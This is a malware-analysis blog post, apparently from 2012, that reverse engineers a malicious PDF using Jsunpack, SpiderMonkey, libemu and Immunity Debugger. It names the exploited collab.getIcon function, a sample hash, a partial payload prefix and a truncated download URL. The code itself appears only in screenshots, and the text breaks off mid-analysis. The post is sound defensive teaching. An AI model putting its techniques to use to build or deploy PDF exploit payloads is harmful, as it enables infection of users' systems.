tag:blogger.com,1999:blog-85015611833076675452024-03-19T06:09:02.025-07:00Mario's Security BlogUnknownnoreply@blogger.comBlogger7125tag:blogger.com,1999:blog-8501561183307667545.post-322017071931310242012-04-09T15:52:00.000-07:002012-04-10T21:47:16.880-07:00Reverse Engineering AudioDr7 PDF Malware<div>
<span style="font-size: large;">1. Introduction</span></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">This
article presents a step by step analysis of a malware we will call AudioDr7 due
to the URL address it attempts to contact. The MD5 hash for the malware is “ca1c1adab23e5baeeb3b49e0809e4ad4”
and a sample can be found at <i>offensivecomputing.com</i>.
The malware is embedded into a PDF document. Several tools are utilized that
aid in the analysis of this malware. Tools to extract the JavaScript, execute a
payload, obtain the shellcode, and later run the malicious code in an emulator
and debugger. All these are shown later in this article.</span></div>
<div>
<br /></div>
<div>
<span style="font-size: large;">2. The Malware</span></div>
<div>
<span style="font-family: Calibri, sans-serif;"><span style="font-size: 11pt; line-height: 115%;">A sample of the m</span><span style="font-size: 15px; line-height: 17px;">alware</span><span style="font-size: 11pt; line-height: 115%;"> analyzed in this article can be obtained at </span><a href="http://www.offensivecomputing.net/" style="font-size: 11pt; line-height: 115%;" target="_blank">http://www.offensivecomputing.net/</a><span style="font-size: 11pt; line-height: 115%;">.</span></span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyWqVaIdDxqZWgmJ4_guYJY8mHw_2McNE-4WjawhP3Ky8Ws6E9Z0yce1u3_DT2iU-inU1wC1Yl3Ci5NCyxLzaDt-fnmJ797I9rNgvh1BLk-KROG4jUwTkJA6TcINzWeNCi3adFmI-KlryO/s1600/Figure1-0.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="326" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyWqVaIdDxqZWgmJ4_guYJY8mHw_2McNE-4WjawhP3Ky8Ws6E9Z0yce1u3_DT2iU-inU1wC1Yl3Ci5NCyxLzaDt-fnmJ797I9rNgvh1BLk-KROG4jUwTkJA6TcINzWeNCi3adFmI-KlryO/s640/Figure1-0.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.0 - <i>Malware found on Offensive Computing</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
analysis is performed on a system running Ubuntu 10.04. The PDF document is examined in a file editor in order to identify any suspicious objects
contained within the file. In Figure 1.1 VIM is used to view the PDF file and
examine its contents. Object 13 is the object shown in Figure 1.1. We can be
sure this is malicious code due to the extremely large content in the variable "s". It includes a string of numbers that will most likely represents some form of
a shellcode.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoFQNSLfF4cOl4HyKyXTdRzZwWT7hZLjrrYm4b801Hz8wCjWXR5SB1oktMD4y6AqHdNcgZl96YDGsd_hL4wUcgwEajAcMzVo5mqPYtM6zY0U2zNQ5jq0DDOPRwkgNw4vH2gH8IYhDK04Vl/s1600/Figure1-1.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoFQNSLfF4cOl4HyKyXTdRzZwWT7hZLjrrYm4b801Hz8wCjWXR5SB1oktMD4y6AqHdNcgZl96YDGsd_hL4wUcgwEajAcMzVo5mqPYtM6zY0U2zNQ5jq0DDOPRwkgNw4vH2gH8IYhDK04Vl/s640/Figure1-1.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.1 - <i>Large string from object 13 from the malicious PDF</i></td></tr>
</tbody></table>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Also
following the string of numbers is JavaScript code that appears to do parsing
for a string. Figure 1.2 shows the code segment following the variable "s" that
was declared. After the preliminary inspection of the PDF document, the tool Jsunpack
[1] is used to extract any JavaScript from the PDF to a separate file.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU1_xpJxrbaxOlnU3HwkOr_kNQoPeT62-KnqXBQeLu1xwn0LIeHodAo-heTQkWgNqMkI71N_gmnN9y4aIBkWlIlGifQNA0DSks5dvsBaBj-6-WZb_A7RLTF2jXuMx7roc8kRNsRHHhcBWT/s1600/Figure1-2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="204" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU1_xpJxrbaxOlnU3HwkOr_kNQoPeT62-KnqXBQeLu1xwn0LIeHodAo-heTQkWgNqMkI71N_gmnN9y4aIBkWlIlGifQNA0DSks5dvsBaBj-6-WZb_A7RLTF2jXuMx7roc8kRNsRHHhcBWT/s640/Figure1-2.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.2 -<i> JavaScript code from object 13 from the malicious PDF</i></td></tr>
</tbody></table>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Figure
1.3 displays the end of the output from Jsunpack. JavaScript is found and it is
written to a separate file named “malware.exe.out”. The output contains the
same information displayed in Figure 1.1 and Figure 1.2. The declaration of the
variable “s” is followed by the code to parse a string.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTlW1-uAvj5G8pXbeGRCGII6LaLrWfHZ1m_cKHWMxU2utGgpM9FZA98sfUlYbl2jgHPgyw6RyUf3b2BykR04Ud-Ghyphenhyphen_tPiaEaJ7z6vhnARGAyvGhZaCkEhYjBV-gs4ILlFTwJAdz7y02mJ/s1600/Figure1-3.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="96" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTlW1-uAvj5G8pXbeGRCGII6LaLrWfHZ1m_cKHWMxU2utGgpM9FZA98sfUlYbl2jgHPgyw6RyUf3b2BykR04Ud-Ghyphenhyphen_tPiaEaJ7z6vhnARGAyvGhZaCkEhYjBV-gs4ILlFTwJAdz7y02mJ/s640/Figure1-3.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.3 -<i> Output from Jsunpuck executed with the malicious PDF</i></td></tr>
</tbody></table>
<div>
<span style="font-size: large;">3. Analysis of the JavaScript</span></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
next step in the analysis is to find a way to obtain the shellcode, if it exists
within the PDF. The next tool to use is SpiderMonkey [2] or Google’s V8 JavaScript
Engine [3]. Both of these programs are JavaScript interpreters and they allow
us to run JavaScript code. We use SpiderMonkey to execute our JavaScript
contained in the file malware.exe.out. Also a patched version of SpiderMonkey
1.7 is available and it makes it easier for malware analysis. It redefines vulnerable
functions and objects in order to prevent infection of the system and make the
analysis easier. The patched version of SpiderMonkey 1.7 is used for this
malware analysis alongside a file defined pre.js that defines document objects
in case of a reference error. The file pre.js can be found inside the Jsunpack
folder.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEUMtEudy_2jU4m80QqKLCwtDf-dd5Oxt35PmCIzNdWBEJNDkzLd2YNuw34AIHRE78iaGAH88j5GPB1Drhiqa3k4j8XjpbsqdVqk58WF68mUFAJpzNQcX3orkRuOCz8wyqHILcWBYccqbT/s1600/Figure1-4.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="31" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEUMtEudy_2jU4m80QqKLCwtDf-dd5Oxt35PmCIzNdWBEJNDkzLd2YNuw34AIHRE78iaGAH88j5GPB1Drhiqa3k4j8XjpbsqdVqk58WF68mUFAJpzNQcX3orkRuOCz8wyqHILcWBYccqbT/s640/Figure1-4.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.4 -<i> Output of SpiderMonkey executed with the malicious PDF</i></td></tr>
</tbody></table>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
command to run SpiderMonkey with the pre.js and JavaScript found in
malware.exe.out is shown in figure 1.4. Two interesting results can be obtained
from SpiderMonkey. First the pre.js file from Jsunpack determines the exploit
that the malware attempts to take advantage of. In this case it is “collab.getIcon”.
The second interesting result is the log files that are created by SpiderMonkey.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_ZcCDe3B9KjfA6THZgYnSl5IrZKBfgJCT7KbXt9FCndP2W97qkXotjGhL1V3kUPTA6ihl-rYT6TdoNXRG_FJbF7GNT4PASmrccuFk6KLTZ2lRwNNgzsgOupfbhXKbK77_0jni-Imh18OQ/s1600/Figure1-5.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="306" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_ZcCDe3B9KjfA6THZgYnSl5IrZKBfgJCT7KbXt9FCndP2W97qkXotjGhL1V3kUPTA6ihl-rYT6TdoNXRG_FJbF7GNT4PASmrccuFk6KLTZ2lRwNNgzsgOupfbhXKbK77_0jni-Imh18OQ/s400/Figure1-5.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.5 -<i> Folder containing the two log files created by SpiderMonkey</i></td></tr>
</tbody></table>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">In
figure 1.5 the files “eval.001.log” and “eval.002.log” are the two files
created by SpiderMonkey. The first file contains the string that is created by
the parsing function in figure 1.2.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmqWefvFx8MrfhKZqzc2TVQdQyns9hh7PB2SW2syRcR8jsl6dNuTol9gabx-3s17gbsuGAD4xvc2LhiLxoXC99HAiTKDN7r3P8xsvBLLIrfQrqSHVfy8Obm308PM1pVsH3VR-XusNdO580/s1600/Figure1-6.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="24" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmqWefvFx8MrfhKZqzc2TVQdQyns9hh7PB2SW2syRcR8jsl6dNuTol9gabx-3s17gbsuGAD4xvc2LhiLxoXC99HAiTKDN7r3P8xsvBLLIrfQrqSHVfy8Obm308PM1pVsH3VR-XusNdO580/s640/Figure1-6.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.6 - <i>Contents of eval.001.log</i></td></tr>
</tbody></table>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
second file executes the string in the first file and we obtain the payload.
Here we find the shellcode initialized to the variable “payload”. The patched SpiderMonkey
makes it easier for us to execute the JavaScript and obtain the shellcode. If
the process was done manually we would have to hook the eval and unescape
statements as print statements. The JavaScript would have to be modified and
executed twice to obtain the same output.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimIO9dIQlqvfiZ5gRFfm7WOnvuQRTi8DQIZb78FM5L8WUDLOi-OA4ATYfHMm2N-BJadfBr1gAj_btGmC6gkav4-YzgnzaOUQy8o3AaYHEP84vVJh-n5fY6k1Xk3QylxYQFGySiS1p-xUvD/s1600/Figure1-7.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="352" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimIO9dIQlqvfiZ5gRFfm7WOnvuQRTi8DQIZb78FM5L8WUDLOi-OA4ATYfHMm2N-BJadfBr1gAj_btGmC6gkav4-YzgnzaOUQy8o3AaYHEP84vVJh-n5fY6k1Xk3QylxYQFGySiS1p-xUvD/s640/Figure1-7.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.7 -<i> Snippet from the contents of eval.002.log</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Figure
1.7 shows a snippet of the contents for eval.002.log. The payload starting with
“%uC033” and ending with “%u0070” is copied and saved in a separate file “payload.txt”.
In order to analyze the shellcode we need to convert to hex representation and
for this we use a Perl script provided by “Malware Analyst’s Cookbook and DVD”
[4].</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguytup3gSw5RIKQEGMYdtAbtZtfXQDKwWJhJasd3bgHrWmaGe8UXdyOgokR38eHmyvhQM4gqLjpJaKldX8NSfz7doR7L0pSYN5ycfPz-pjrM4kg8PvFqjP30057LihEFSHbx9EnRctysEy/s1600/Figure1-9.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguytup3gSw5RIKQEGMYdtAbtZtfXQDKwWJhJasd3bgHrWmaGe8UXdyOgokR38eHmyvhQM4gqLjpJaKldX8NSfz7doR7L0pSYN5ycfPz-pjrM4kg8PvFqjP30057LihEFSHbx9EnRctysEy/s640/Figure1-9.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.8 -<i> Payload converted to shellcode with Perl Script</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Figure
1.8 shows the HEX and ASCII representation of the shellcode we converted from
the payload string. The ASCII representation displays a url http://audiodr7... that
is most likely the address the malware will attempt to contact and download
more malicious code. The shellcode should be saved in a separate file labeled in
this example “shellcode.txt”. Figure 1.9 shows the command to save the output
to a separate file.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggW-osZAm_znkyg7LgLIRwo-8-rGhfmYIeG9F2TJMKAxyt6l4CgY-z25MMthjD1rUTQjv0-BQd5bqJhfQbnwSIggyaErkJ3_C71xgrjRbw8hhRD9pTRKc8s2F25RJBhXZjowCGodFQY84G/s1600/Figure1-10.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="22" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggW-osZAm_znkyg7LgLIRwo-8-rGhfmYIeG9F2TJMKAxyt6l4CgY-z25MMthjD1rUTQjv0-BQd5bqJhfQbnwSIggyaErkJ3_C71xgrjRbw8hhRD9pTRKc8s2F25RJBhXZjowCGodFQY84G/s640/Figure1-10.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.9 - <i>Shellcode saved to text file named "shellcode.txt"</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-size: large;">4. Analysis of Shellcode</span></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
next step is to utilize a tool called libemu [5] that runs shellcode in an
emulated environment. Libemu should pop an alert if any windows api functions
are called and provide the instructions that are executed.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGsEa7VaKF4o4x71DT3Xh3FrMoWbjNumegnNWxuTsmQj5qBw7MjVTuSBTTG5nwvnSuJVAXOFbmyOvQhuChaneSC-avElKwD5RWAvjrCu6pHHhOQ8jWRwB1gRpvLRtgBoVIJRgA4ToJ0a2b/s1600/Figure1-11.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="54" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGsEa7VaKF4o4x71DT3Xh3FrMoWbjNumegnNWxuTsmQj5qBw7MjVTuSBTTG5nwvnSuJVAXOFbmyOvQhuChaneSC-avElKwD5RWAvjrCu6pHHhOQ8jWRwB1gRpvLRtgBoVIJRgA4ToJ0a2b/s640/Figure1-11.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.10 - <i>Output of libemu executed with shellcode</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">In
Figure 1.10 the step size is 100000 and the option verbose is enabled. Libemu
displays that the windows function GetTempPathA is called by the malware and
the execution stops there. The reason the execution is stopped because
GetTempPathA expects a temporary path to be returned to the program to use and
none is given so the program cannot continue. This is one limitation of libemu.
However, we can perform a manual analysis of the binary instructions of the
malware and a user level debugger Immunity debugger [6] can be utilized.</span></div>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
hex code is needed to inject the malware into immunity debugger. Figure 1.8 displays the hex code and this code is copied to a separate file labeled “hexdump.txt”. To facilitate the process of obtaining the hex
code without the offset or ASCII information the command in Figure 1.11 is used.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgH2hUuQk2ENEmpohvhZGSB3nJoNNW9lcTsZqxRM03_2v_ncG96X28PKssZ9C5pcozj8lGADHG-yNT_Cr_QN18QcPV2rUNmR4ZX_ki8qd-lXMvXL4FEiFAsNLJXFLGm8us30aiYR2vIYRme/s1600/Figure1-12.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="214" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgH2hUuQk2ENEmpohvhZGSB3nJoNNW9lcTsZqxRM03_2v_ncG96X28PKssZ9C5pcozj8lGADHG-yNT_Cr_QN18QcPV2rUNmR4ZX_ki8qd-lXMvXL4FEiFAsNLJXFLGm8us30aiYR2vIYRme/s640/Figure1-12.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.11 - <i>Hex dump only of the malicious shellcode</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Instead
of displaying it on the screen we save it to the file hexdump.txt as shown in
Figure 1.12.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq4GC3JaDcUCfQiqjX0zCBvbNL2BnEN9gVdsAp0mf-fhwnjq_YKWqgcQ90X5nqvLL-rhH9h4rw_j4zNdJsc5VsjSUU4mwpmdx28otZUkAmIzLHG32bzS04HTgVFX-_SryuIudIFdl5sFl2/s1600/Figure1-13.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="22" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq4GC3JaDcUCfQiqjX0zCBvbNL2BnEN9gVdsAp0mf-fhwnjq_YKWqgcQ90X5nqvLL-rhH9h4rw_j4zNdJsc5VsjSUU4mwpmdx28otZUkAmIzLHG32bzS04HTgVFX-_SryuIudIFdl5sFl2/s640/Figure1-13.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.12 - <i>Command to output shellcode to text file in hex code format</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Immunity
debugger is installed on a system running Windows XP SP2. From the hex dump
file we can easily obtain the executable file by using the online Sandsprite
tool “shellcode 2 exe” [7]. The hex dump is pasted into the textbox provided by
the webpage and the executable is created and downloaded to the system.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3VHr-Y-MyFWnrAGYKNwiSxTm3UtaM8NeCflwDIF47MGH79bRFFOsdcCVWOQKBY-76CLbKnjSYwJgdPbKqldwFhf8oqmdBGVe_oi990q_r95OblDRjV15zlOLtWOgk6J2EZRxPf2rv0SZX/s1600/Figure1-14.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="318" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3VHr-Y-MyFWnrAGYKNwiSxTm3UtaM8NeCflwDIF47MGH79bRFFOsdcCVWOQKBY-76CLbKnjSYwJgdPbKqldwFhf8oqmdBGVe_oi990q_r95OblDRjV15zlOLtWOgk6J2EZRxPf2rv0SZX/s400/Figure1-14.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.13 - <i>Shellcode 2 exe web interface</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
file created is labeled “shellcode.exe_”. This file can be opened with immunity
debugger.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBQZnLKO8H3bCEp9bYHFlMNcj7IZfZfbNODCVJnR9Ofl6hZF6MWGqR6tPicQEIj30TrN7vYzc5eNt_l8uEiAbvQPAs-IVHNpID5npT8VKlekkqwOtp9ZNnVfVV6YRqF-xBM4HRjORKVIiM/s1600/Figure1-15.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="402" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBQZnLKO8H3bCEp9bYHFlMNcj7IZfZfbNODCVJnR9Ofl6hZF6MWGqR6tPicQEIj30TrN7vYzc5eNt_l8uEiAbvQPAs-IVHNpID5npT8VKlekkqwOtp9ZNnVfVV6YRqF-xBM4HRjORKVIiM/s640/Figure1-15.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.14 -<i> Shellcode executable loaded into Immunity Debugger</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">To
step through the program the key “F8” is used. To step into a function the key “F7”
is used. To set a software breakpoint the key “F2” is used. To run the program
or execute until a breakpoint is reached, the key “F9” is used. These are the commands
used for this analysis. For an explanation on how to use Immunity Debugger refer
to Dr. Fu’s Security Blog [8].</span></div>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
first interesting instruction is at the address 00401002. Here the instruction “MOV
EAX, DWORD PTR FS:[EAX+30]” copies an address to the EAX register. The FS
segment region should set a red flag because this region stores critical
information. The description of this location can be verified with winDBG.
Attach windbg to any process or executable and examine the data structure for
the thread information block.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF8c0HoFOYy-8t1-ePhymxnFiHzQekTXNeTyJyF1TNlGfbAdjjq8p07fyVV3q5IqAROzWMxYLWkMFDlxzWCiKmBTS2s7GyDJDYGTdwkiB7ogilDvxuhFlpU0x9SnhhMbziPgK2WdoBQSDm/s1600/Figure1-16.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF8c0HoFOYy-8t1-ePhymxnFiHzQekTXNeTyJyF1TNlGfbAdjjq8p07fyVV3q5IqAROzWMxYLWkMFDlxzWCiKmBTS2s7GyDJDYGTdwkiB7ogilDvxuhFlpU0x9SnhhMbziPgK2WdoBQSDm/s400/Figure1-16.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.15 - <i>Data structure for Thread Environment Block in WinDBG</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">As
we can see in Figure 1.15 the Instruction FS:[30] refers to the ProcessEnvironmentBlock
section and it is a 32-bit pointer. The next location that is saved to the EAX
register is at the address 00401008. DS[EAX+C] is executed and after
DS[EAX+1C]. First DS[EAX+C] saves the address of the “Ldr” which is a pointer
to _PEB_LDR_DATA. This can be verified with WinDBG.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit4rgnjjxrG6bDgqBwcz26EPll8OK8ClqWI_axps8uejpLG05XOqpbF-sgIhXc5M_y0ehltQARopRbEPv67XayUz08DeEnLfczRxY9h7wGKsXLQfZllrItstzpTmwv1peu8m0ij85uwutd/s1600/Figure1-17.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit4rgnjjxrG6bDgqBwcz26EPll8OK8ClqWI_axps8uejpLG05XOqpbF-sgIhXc5M_y0ehltQARopRbEPv67XayUz08DeEnLfczRxY9h7wGKsXLQfZllrItstzpTmwv1peu8m0ij85uwutd/s400/Figure1-17.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.16 -<i> Data structure of _PEB in WinDBG</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
second instruction DS[EAX+1C] now saves the address of InInitializationOrderModuleList
to the EAX register. This address points to the beginning of a list of modules
and the malware will probably try to access one of these modules later. This
can also be verified with Windbg.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgK-27u5F7y6-Y7hEM_pI11MnwJTXQcHeKkcJvwXNhyphenhyphenVFi2Ie-aP-IYQIJ_LvSKSgEa7JUmq7mtGalw6ExRXCCJjL575Bi9F_J49ODgbGrnC0EPdixfLrYKwqU9zUIqJA-wcs6_V9bsGNsN/s1600/Figure1-19.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgK-27u5F7y6-Y7hEM_pI11MnwJTXQcHeKkcJvwXNhyphenhyphenVFi2Ie-aP-IYQIJ_LvSKSgEa7JUmq7mtGalw6ExRXCCJjL575Bi9F_J49ODgbGrnC0EPdixfLrYKwqU9zUIqJA-wcs6_V9bsGNsN/s400/Figure1-19.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.17 - <i>Data structure of _PEB_LDR_DATA</i></td></tr>
</tbody></table>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">As
we can see in Figure 1.17 InInitializationOrderModuleList is at the offset 1C.
Next let us set a breakpoint at 0040105F. As we can see from figure 1.20 there
is a nested loop. After some analysis we can conclude that the malware has its
own hash table and attempts to locate a specific function to load from
kernel32.dll. At the address 0040105B the instruction CMP EDI, EAX compares the
hash values and if they are not equal continues to search the list of modules.
When the malware finds the module it will pass the instruction JNZ and continue
to the instruction at 0040105F which pops the top of the stack to the ESI
register.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
